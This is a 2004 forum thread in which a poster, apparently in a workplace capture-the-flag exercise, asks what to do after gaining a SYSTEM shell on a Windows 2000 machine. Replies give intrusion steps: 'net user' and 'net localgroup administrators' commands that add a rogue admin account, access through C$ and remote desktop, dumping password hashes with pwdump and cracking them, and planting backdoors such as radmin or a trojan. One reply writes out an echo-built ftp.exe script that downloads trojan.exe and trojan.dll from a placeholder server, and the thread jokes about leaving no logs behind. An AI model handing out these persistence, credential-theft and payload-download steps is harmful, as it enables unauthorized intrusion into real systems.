Forums: Cmd.exe Shell With System Lev Priv, What Do Next? - Forums

Hi,

We have a training exercise going on here at work, something like "capture the flag".

I was able to obtain a remote command shell with system level privelages from a W2K box, but I don't know what to do next?

My thoughts were maybe running pwdump3e to dump the hash, but I don't know how to run that remotely, because I don't have admin password yet.

I was able to use "enum" to enumerate username from my target machine, but I don't have any passwords.

The ports that are open on my target machine: 25, 80, 135, 139, 443, 445, 1025, 1026, 3389.

I also thought about mapping a share remotely, and then poking around on the target machine, to see if I can find the hidden flags, but I think I have to have a valid username and password to do that.

The goal of this exercise is for me to to be able to gain additional privelages(i.e administrator) and find files and scripts with passwords, network design, or any useful documents.

Any ideas?

Simply add a new user to the admingroup and login at 3389 with a terminal client now u have full admin priviliges and a gui ;)

you can upload pwdump to the remote computer with ftp.exe (just do a forum search and you'll see how to use it)
you might want to install an ftp server for easy browsing or a vnc

or can't you run files with your privelages? :unsure:

Learn about the NET command, exactly how to create a user account and a share.

hint: net help


Greetz

you got a command shell with system level priviliges then just add a admin account and as 139 and 445 are open means netbios sahring is open . then in explorer type \\victimpc\c$ and enter user pass of ur admin account u created and u are in c$ with read write access . similarly d$ e$ for other drives .

Thank you all for your help. I'm going to the lab now and try some of your suggestions. I'll let you know how it turns out.

I also used a tool to check for "joe " accounts, and I think I found a few, but what exactly is a "joe account"?

brOmstar, on Aug 18 2004, 01:33 PM, said:

stupid question .... how can i add a new user ?? what do I need ?? what is a terminal client ??

:unsure:

Use pwdump and dump the hashes to hashes.txt and download the txt file
now use LC5 or when you have rainbowcrack tables rcrack normally you can crack all passwords. Or you add a new user with admin rights or you install a backdoor like radmin :( you have the choice ;)

KuerbY, on Aug 18 2004, 03:11 PM, said:

but how can somebody start or transfair r_admin without exec right ??

grml u have system rights the rest is so simply but it depends on waht u want..

@cmdline with sys-priviliges type

net user username password /add
net localgroup administrators username /add

(if domain controller add)
net group "domain admins" username /add

after that is done simply open the remote desktop client on ur own box and connect to the ip(included in xp/downloadable at ms for 2000/under *nix use rdesktop as client)

logon screen appears use ur created account -> ur r admin with a full remote desktop session what u want more?


now u can do anything what u can do on ur own system !!


@carny u r the system u can do anything

Thanks again.

I used the tips given above and created a new user and added that user to the administrators group. I then connected to C$ and was able to view files on my target system. My co-worker who set up this lab, had files on the target system that contained username and passwords and I was able to find tthose files.

Next, I need to figure out how to upload tools? Can you do that with the remote administration utility? I'm getting ready to try that now.

Also, do you all know of any good backdoors for W2K?

Thanks again for your help.

dude think little bit . when u are connected to c$ just copy ur trojan server and pastes it somewhere and execute it fom dos box :P . thats all

vicky, on Aug 18 2004, 07:34 PM, said:

true :)
but make sure you execute the backdoor from the cmd shell
not from explorer view in the share (using double click) since that'll make the backdoor run on your computer

annointed3, on Aug 18 2004, 01:27 PM, said:

then why are u asking all these questions, i mean, arent they teaching u anything?

besides, u ask us what to do next, i think u need to capture the flag...

and besides, if u have (created) an admin account and u can axx it using a remote screen why u need a backdoor for then ? U can do everything possible then so capture the so called flag.

nobody saiid that u can add an echo file :

echo open blablaftpserver PORT >> c:\whereuwant.txt
echo user blaaaa >> c:\whereuwant.txt
echo pass böaaa >> c:\whereuwant.txt
echo BINARY >> c:\whereuwant.txt
echo get troan.exe >> c:\whereuwant.txt
echo get trojan.dll >> c:\whereuwant.txt
echo quit

hehe ;)


it'LL only work if ftp.exe is avaible ;)

hf with capturing the logs u have left ^^


edit !: another example ;D

sex is like hacking , u get in u get out and u hope that u don't left something behind that can be traced back to u ^^


gr€€tZ fL4Shb4Ck